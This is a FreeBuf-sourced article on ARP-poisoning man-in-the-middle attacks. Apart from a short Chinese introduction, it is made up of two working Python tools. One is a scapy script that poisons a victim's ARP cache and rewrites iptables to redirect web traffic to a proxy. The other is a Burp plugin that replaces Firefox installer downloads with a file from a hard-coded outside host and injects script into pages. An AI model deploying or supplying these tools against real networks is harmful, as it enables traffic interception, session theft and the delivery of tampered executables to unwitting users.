转自:FreebuF.COM
ARP毒化攻击是一种比较老的攻击技术,是中间人攻击的一种途径。传统的攻击方法重点在于信息的收集(密码、Cookie、CSRF令牌等等任何信息)。有时这种攻击也用来对付通过SSL协议访问的目标。但是其中一个攻击途径我认为没有引起足够的重视,就是让中间人作为一个活跃的攻击点去攻击各类Web应用。关于这种技术大部分的内容都能在网络上找到,但是使用的例子我认为都是零散的,也不够完整。
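from __future__ import print_function

import argparse
import os
import subprocess
import sys
import time

from scapy.all import ARP, conf, send


def _run_output(argv):
    """Run argv (no shell) and return its stdout as text, or "" on any failure.

    Replaces os.popen(string) so interface names and other CLI values are
    passed as argv elements rather than interpolated into a shell command.
    """
    try:
        out = subprocess.check_output(argv)
    except (OSError, subprocess.CalledProcessError):
        return ""
    if isinstance(out, bytes):
        out = out.decode("utf-8", "replace")
    return out


def _run(argv):
    """Run argv without a shell; warn on a non-zero exit instead of ignoring it.

    os.system() discarded the exit status, so a failed iptables call went
    unnoticed and the victim's traffic was silently not redirected.
    """
    rc = subprocess.call(argv)
    if rc != 0:
        print("Warning: %s exited with status %d" % (" ".join(argv), rc))
    return rc


def _write_procfs(path, value):
    """Write a single value to a /proc/sys knob (needs root)."""
    with open(path, "w") as fh:
        fh.write(value)


def arpPoison(args):
    """Poison the victim's ARP cache until Ctrl-C.

    Every args.freq seconds sends an ARP packet with psrc = args.router and
    pdst = args.victim, so the victim maps the gateway IP to this host's MAC
    (the sender MAC is left at scapy's default, presumably this host's).
    Only the victim's cache is poisoned; replies from the real gateway reach
    this host because fwconf() MASQUERADEs the forwarded traffic.  The
    victim's real gateway entry is NOT restored on exit.
    """
    conf.iface = args.iface
    pkt = ARP()
    pkt.psrc = args.router
    pkt.pdst = args.victim
    try:
        while True:
            send(pkt, verbose=args.verbose)
            time.sleep(args.freq)
    except KeyboardInterrupt:
        # Ctrl-C is the normal way to stop; return so the caller exits cleanly.
        pass


#default just grabs the default route, http://pypi.python.org/pypi/pynetinfo/0.1.9 would be better
#but this just works and people don't have to install external libs
def getDefRoute(args):
    """Set args.router to the default gateway of args.iface from `route -n`.

    Picks the 0.0.0.0 destination row whose Iface column (last field) equals
    args.iface exactly; the previous substring test also matched "eth1"
    against "eth10".  Exits with status 1 if no row matches.
    """
    for line in _run_output(["/sbin/route", "-n"]).splitlines():
        fields = line.split()
        if line.startswith("0.0.0.0") and fields and fields[-1] == args.iface:
            print("Setting route to the default: " + fields[1])
            args.router = fields[1]
            return
    print("Error: unable to find default route")
    sys.exit(1)


#default just grabs the default IP, http://pypi.python.org/pypi/pynetinfo/0.1.9 would be better
#but this just works and people don't have to install external libs
def getDefIP(args):
    """Set args.proxy to the IPv4 address of args.iface from `ifconfig`.

    Understands both the old net-tools format ("inet addr:10.0.0.5  Bcast:...")
    and the newer one ("inet 10.0.0.5  netmask ...").  Exits with status 1
    if neither form is found.
    """
    for line in _run_output(["/sbin/ifconfig", args.iface]).splitlines():
        line = line.strip()
        if line.startswith("inet addr:"):
            args.proxy = line.split(":")[1].split()[0]
        elif line.startswith("inet "):
            args.proxy = line.split()[1]
        else:
            continue
        print("setting proxy to: " + args.proxy)
        return
    print("Error: unable to find default IP")
    sys.exit(1)


def fwconf(args):
    """Turn this host into a transparent redirecting gateway (needs root).

    Enables IPv4 forwarding, disables ICMP redirects on args.iface (so the
    kernel does not tell the victim about the real gateway), then FLUSHES
    every existing rule in the filter and nat tables before adding the
    FORWARD accept, MASQUERADE, and one DNAT per port in args.ports to
    args.proxy.  Nothing is restored on exit.
    """
    if not args.iface or "/" in args.iface:
        # The interface name becomes a path component under /proc/sys below.
        print("Error: invalid interface name %r" % args.iface)
        sys.exit(1)
    # Validate all ports before touching the firewall so a typo cannot leave
    # the rules half-applied after the flush.
    ports = [p.strip() for p in args.ports.split(",")]
    for port in ports:
        if not port.isdigit() or not 0 < int(port) < 65536:
            print("Error: invalid port %r in --ports" % port)
            sys.exit(1)

    #write appropriate kernel config settings
    _write_procfs("/proc/sys/net/ipv4/ip_forward", "1")
    _write_procfs("/proc/sys/net/ipv4/conf/" + args.iface + "/send_redirects", "0")

    #iptables stuff -- note: --flush wipes any rules already on this host
    _run(["/sbin/iptables", "--flush"])
    _run(["/sbin/iptables", "-t", "nat", "--flush"])
    _run(["/sbin/iptables", "--zero"])
    _run(["/sbin/iptables", "-A", "FORWARD", "--in-interface", args.iface,
          "-j", "ACCEPT"])
    _run(["/sbin/iptables", "-t", "nat", "--append", "POSTROUTING",
          "--out-interface", args.iface, "-j", "MASQUERADE"])
    #forward 80,443 to our proxy
    # NOTE(review): not restricted to the victim (no "-s args.victim"), so any
    # host routing through this machine on these ports is redirected too.
    for port in ports:
        _run(["/sbin/iptables", "-t", "nat", "-A", "PREROUTING", "-p", "tcp",
              "--dport", port, "--jump", "DNAT", "--to-destination", args.proxy])


def _str2bool(value):
    """argparse `type` for boolean flags.

    The original used type=bool, but bool("False") is True, so
    `--fwconf False` still configured the firewall.
    """
    if isinstance(value, bool):
        return value
    text = value.strip().lower()
    if text in ("1", "true", "t", "yes", "y", "on"):
        return True
    if text in ("0", "false", "f", "no", "n", "off"):
        return False
    raise argparse.ArgumentTypeError("expected a boolean, got %r" % value)


def main(argv=None):
    """Parse the CLI, fill in router/proxy defaults, configure NAT, poison."""
    parser = argparse.ArgumentParser()
    parser.add_argument('--victim', required=True, help="victim IP")
    parser.add_argument('--router', default=None,
                        help="gateway IP to impersonate (default: default route of --iface)")
    parser.add_argument('--iface', default='eth1')
    parser.add_argument('--fwconf', type=_str2bool, default=True,
                        help="Try to auto configure firewall")
    parser.add_argument('--freq', type=float, default=5.0,
                        help="frequency to send packets, in seconds")
    parser.add_argument('--ports', default="80,443",
                        help="comma seperated list of ports to forward to proxy")
    parser.add_argument('--proxy', default=None,
                        help="IP the intercepting proxy listens on (default: address of --iface)")
    parser.add_argument('--verbose', type=_str2bool, default=True)
    args = parser.parse_args(argv)

    if hasattr(os, "geteuid") and os.geteuid() != 0:
        # /proc/sys writes, iptables and raw ARP sends all need root; fail loudly early.
        print("Warning: not running as root; firewall setup and packet sending will likely fail")

    #set default args
    if args.router is None:
        getDefRoute(args)
    if args.proxy is None:
        getDefIP(args)
    #do iptables rules
    if args.fwconf:
        fwconf(args)
    arpPoison(args)


if __name__ == "__main__":
    main()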
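from __future__ import print_function

from gds.burp.api import IProxyRequestHandler
from gds.burp.core import Component, implements


class ExamplePlugin(Component):
    """Burp proxy handler demonstrating two active man-in-the-middle payloads.

    processRequest() swaps a Firefox installer download for one fetched from
    a hard-coded host; processResponse() injects a script before the first
    </head> of a response.  Demo code: the host, path and payload below are
    constants meant to be edited for a given engagement.
    """
    implements(IProxyRequestHandler)

    # Host/path that serve the replacement installer (demo constants).
    REDIRECT_HOST = "131.107.39.100"
    REDIRECT_PATH = "/downloads/Firefox%20Setup%2013.0.1.exe"
    # Proof-of-concept payload; alert(document.domain) shows which origin it runs in.
    INJECT_SCRIPT = "<script>alert(document.domain)</script>"

    def processRequest(self, request):
        """Rewrite any request whose URL looks like a Firefox installer download.

        Matching is a case-sensitive substring test for "Firefox%20Setup%20"
        and ".exe" on the URL as the browser encoded it.  The rewritten
        request carries only a Host header: none of the original headers
        (cookies, User-Agent, Range) are forwarded.
        """
        url = request.url.geturl()
        if "Firefox%20Setup%20" in url and ".exe" in url:
            print("Firefox download detected, redirecting")
            request.host = self.REDIRECT_HOST
            request.raw = ("GET " + self.REDIRECT_PATH + " HTTP/1.1\r\n" +
                           "HOST: " + self.REDIRECT_HOST + "\r\n\r\n")

    def processResponse(self, request):
        """Inject INJECT_SCRIPT before the first </head> in the response body.

        The `self.attack += 1` guard is meant to inject only once: it raises
        AttributeError until self.attack is assigned, and injection happens
        only in that except branch.  Since nothing currently assigns
        self.attack, every matching response is injected; assign
        `self.attack = 1` after injecting to make it fire once.  The bare
        except is narrowed to AttributeError so real errors are not hidden.
        """
        try:
            self.attack += 1
        except AttributeError:
            #simply inject into the first </head> we see
            if "</head>" in request.response.raw:
                print("Beginning Injection...")
                request.response.raw = request.response.raw.replace(
                    "</head>", self.INJECT_SCRIPT + "</head>", 1)
                # Uncomment to inject only once:
                #self.attack = 1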